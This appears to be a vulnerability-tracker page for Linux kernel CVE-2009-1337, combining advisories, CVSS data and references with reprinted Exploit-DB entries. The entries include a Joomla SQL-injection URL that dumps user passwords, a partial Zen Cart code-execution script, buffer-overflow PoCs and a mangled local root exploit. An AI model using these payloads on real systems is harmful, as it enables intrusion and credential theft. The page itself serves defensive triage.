CVE-2009-1337
published 2009-04-22CVE-2009-1337: The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which…
PriorityP425medium4.4CVSS 2.0
AVLACMAuNCPIPAP
EXPLOIT
EPSS
1.26%
65.8th percentile
The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.
Affected
299 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.29 | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.4MEDIUMAV:L/AC:M/Au:N/C:P/I:P/A:P
vendor_ubuntu4.9MEDIUM
vendor_redhat4.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VMware
VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.
vendor_vmware·2009-11-20·CVSS 5.0
CVE-2007-2052 [MEDIUM] VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.
VMSA-2009-0016: VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.
a. JRE Security Update JRE update to version 1.5.0_20, which addresses multiple security issues that existed in earlier releases of JRE. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_20: CVE-2009-
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2009-07-02·CVSS 4.9
CVE-2009-1242 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
Igor Zhbanov discovered that NFS clients were able to create device nodes
even when root_squash was enabled. An authenticated remote attacker
could create device nodes with open permissions, leading to a loss of
privacy or escalation of privileges. Only Ubuntu 8.10 and 9.04 were
affected. (CVE-2009-1072)
Dan Carpenter discovered that SELinux did not correctly handle
certain network checks when running with compat_net=1. A local
attacker could exploit this to bypass network checks. Default Ubuntu
installations do not enable SELinux, and only Ubuntu 8.10 and 9.04 were
affected. (CVE-2009-1184)
Shaohua Li discovered that memory was not correctly initialized in the
AGP subsystem. A local attacker could potentially re
Red Hat
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
vendor_redhat·2009-02-25·CVSS 4.4
CVE-2009-1337 [MEDIUM] kernel: exit_notify: kill the wrong capable(CAP_KILL) check
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.
GHSA
GHSA-w3gg-x9j7-v653: The exit_notify function in kernel/exit
ghsa_unreviewed·2022-05-02
CVE-2009-1337 [MEDIUM] GHSA-w3gg-x9j7-v653: The exit_notify function in kernel/exit
The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.
No detection rules found.
Exploit-DB
Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection
exploitdb·2009-08-11
CVE-2009-3417 Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection
Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection
---
#####################################################################################
#### com_idoblog SQL Injection ALL VERSIONS ####
#####################################################################################
# #
# Descubierto por : KKR #
# Somos: knet, kiko, ricota, servl #
# Contacto: elricota[*A*T*]gmail[*D*O*T]com #
#####################################################################################
[+] Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+] Esta sql injection afecta todas las versiones.
[-]
[+] exploit:
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Exploit-DB
Zen Cart 1.3.8 - Remote Code Execution
exploitdb·2009-06-23
CVE-2009-2255 Zen Cart 1.3.8 - Remote Code Execution
Zen Cart 1.3.8 - Remote Code Execution
---
#!/usr/bin/php
|
| |
| \$system> php $argv[0] |
| Notes: ex: http://victim.com/site (no slash) |
| |
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_image" => array(frmdt_type => "tgreal/suce", # it w
Exploit-DB
DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)
exploitdb·2009-05-14
CVE-2009-1817 DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)
DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)
---
#####################################################################################################
# DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
#####################################################################################################
# DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
# Discovered by SirGod
Exploit-DB
Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)
exploitdb·2009-05-04
CVE-2009-4759 Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)
Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)
---
#####################################################################################################
# Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
# Downlaod : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
# milw0rm.com [2009-05-04]
Exploit-DB
EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-05-04
CVE-2009-4757 EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)
EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)
---
#####################################################################################################
# EW-MusicPlayer0.8 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
# Download : http://www.brothersoft.com/ew-musicplayer-download-97163.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
# milw0rm.com [2009-05-04]
Exploit-DB
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
exploitdb·2009-04-08
CVE-2009-1337 Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
Linux Kernel > /tmp/.m.c
#include
int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF
cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c
echo -e "Compiling the exploit code..."
cat >> /tmp/exploit.c
#include
#include
#include
#include
int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}
int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF
cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c
Bugzilla
CVE-2009-1337 kernel: exit_notify: kill the wrong capable(CAP_KILL) check
bugzilla·2009-04-03·CVSS 4.4
CVE-2009-1337 [MEDIUM] CVE-2009-1337 kernel: exit_notify: kill the wrong capable(CAP_KILL) check
CVE-2009-1337 kernel: exit_notify: kill the wrong capable(CAP_KILL) check
Description of problem:
A malicious application can execute a setuid binary before exit. This would mean that we will not reset the ->exit_signal to SIGCHLD unless the binary drops CAP_KILL.
Reference:
http://marc.info/?l=linux-kernel&m=123560588713763&w=2
Discussion:
[RESEND] exit_notify: kill the wrong capable(CAP_KILL) check
http://patchwork.kernel.org/patch/16544/
---
Created attachment 338457
Upsream patch
Upstream commit:
http://git.kernel.org/linus/432870dab85a2f69dc417022646cb9a70acf7f94
---
Upstream commit for 2.4
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git;a=commitdiff;h=8d1f2ab731ab54b12f82eed4da4d1cefd238578c
---
This issue has been addressed in following products:
MRG
CTF
pwn / zapping_setuid_2
ctf_writeups·2023·CVSS 6.9
CVE-2009-0876 [MEDIUM] pwn / zapping_setuid_2
# Zapping a Setuid 1 & 2
by YiFei Zhu
This challenge explores how you could trick the `readlink("/proc/self/exe")`
syscall.
> Zapping a Setuid 1
>
> I was reading [how Zapps work](https://zapps.app/technology/) the other day
> and I thought I could [do better](https://github.com/warptools/ldshim/issues/1).
> However, what happens when a setuid was zapped?
>
> `$ socat file:$(tty),raw,echo=0 tcp:zapp-setuid-1.chal.uiuc.tf:1337`
>
> Hint: Oops I left [CVE-2009-0876](https://bugs.gentoo.org/260331) open.
> Zapping a Setuid 2
>
> Ok ok ok, but what if there was another way?
>
> `$ socat file:$(tty),raw,echo=0 tcp:zapp-setuid-2.chal.uiuc.tf:1337`
>
> Hint 1: The "zapps" symlink is for accessibility. The intended solution does not
> depend on the symlink.
>
> Hint 2: The additional patches t
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=432870dab85a2f69dc417022646cb9a70acf7f94http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00000.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00002.htmlhttp://marc.info/?l=linux-kernel&m=123560588713763&w=2http://patchwork.kernel.org/patch/16544/http://rhn.redhat.com/errata/RHSA-2009-0473.htmlhttp://secunia.com/advisories/34917http://secunia.com/advisories/34981http://secunia.com/advisories/35011http://secunia.com/advisories/35015http://secunia.com/advisories/35120http://secunia.com/advisories/35121http://secunia.com/advisories/35160http://secunia.com/advisories/35185http://secunia.com/advisories/35226http://secunia.com/advisories/35324http://secunia.com/advisories/35387http://secunia.com/advisories/35390http://secunia.com/advisories/35394http://secunia.com/advisories/35656http://secunia.com/advisories/37471http://wiki.rpath.com/Advisories:rPSA-2009-0084http://www.debian.org/security/2009/dsa-1787http://www.debian.org/security/2009/dsa-1794http://www.debian.org/security/2009/dsa-1800http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc1http://www.mandriva.com/security/advisories?name=MDVSA-2009:119http://www.mandriva.com/security/advisories?name=MDVSA-2009:135http://www.openwall.com/lists/oss-security/2009/04/07/1http://www.openwall.com/lists/oss-security/2009/04/17/3http://www.redhat.com/support/errata/RHSA-2009-0451.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1024.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1077.htmlhttp://www.securityfocus.com/archive/1/503610/100/0/threadedhttp://www.securityfocus.com/archive/1/507985/100/0/threadedhttp://www.securityfocus.com/archive/1/512019/100/0/threadedhttp://www.securityfocus.com/bid/34405http://www.securitytracker.com/id?1022141http://www.ubuntu.com/usn/usn-793-1http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlhttp://www.vupen.com/english/advisories/2009/3316https://bugzilla.redhat.com/show_bug.cgi?id=493771https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10919https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11206https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8295https://rhn.redhat.com/errata/RHSA-2009-1550.htmlhttps://www.redhat.com/archives/fedora-package-announce/2009-May/msg01126.htmlhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=432870dab85a2f69dc417022646cb9a70acf7f94http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00000.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-06/msg00002.htmlhttp://marc.info/?l=linux-kernel&m=123560588713763&w=2http://patchwork.kernel.org/patch/16544/http://rhn.redhat.com/errata/RHSA-2009-0473.htmlhttp://secunia.com/advisories/34917http://secunia.com/advisories/34981http://secunia.com/advisories/35011http://secunia.com/advisories/35015http://secunia.com/advisories/35120http://secunia.com/advisories/35121http://secunia.com/advisories/35160http://secunia.com/advisories/35185http://secunia.com/advisories/35226http://secunia.com/advisories/35324http://secunia.com/advisories/35387http://secunia.com/advisories/35390http://secunia.com/advisories/35394http://secunia.com/advisories/35656http://secunia.com/advisories/37471http://wiki.rpath.com/Advisories:rPSA-2009-0084http://www.debian.org/security/2009/dsa-1787http://www.debian.org/security/2009/dsa-1794http://www.debian.org/security/2009/dsa-1800http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc1http://www.mandriva.com/security/advisories?name=MDVSA-2009:119http://www.mandriva.com/security/advisories?name=MDVSA-2009:135http://www.openwall.com/lists/oss-security/2009/04/07/1http://www.openwall.com/lists/oss-security/2009/04/17/3http://www.redhat.com/support/errata/RHSA-2009-0451.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1024.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1077.htmlhttp://www.securityfocus.com/archive/1/503610/100/0/threadedhttp://www.securityfocus.com/archive/1/507985/100/0/threadedhttp://www.securityfocus.com/archive/1/512019/100/0/threadedhttp://www.securityfocus.com/bid/34405http://www.securitytracker.com/id?1022141http://www.ubuntu.com/usn/usn-793-1http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlhttp://www.vupen.com/english/advisories/2009/3316https://bugzilla.redhat.com/show_bug.cgi?id=493771https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10919https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11206https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8295https://rhn.redhat.com/errata/RHSA-2009-1550.htmlhttps://www.redhat.com/archives/fedora-package-announce/2009-May/msg01126.html
2009-04-22
Published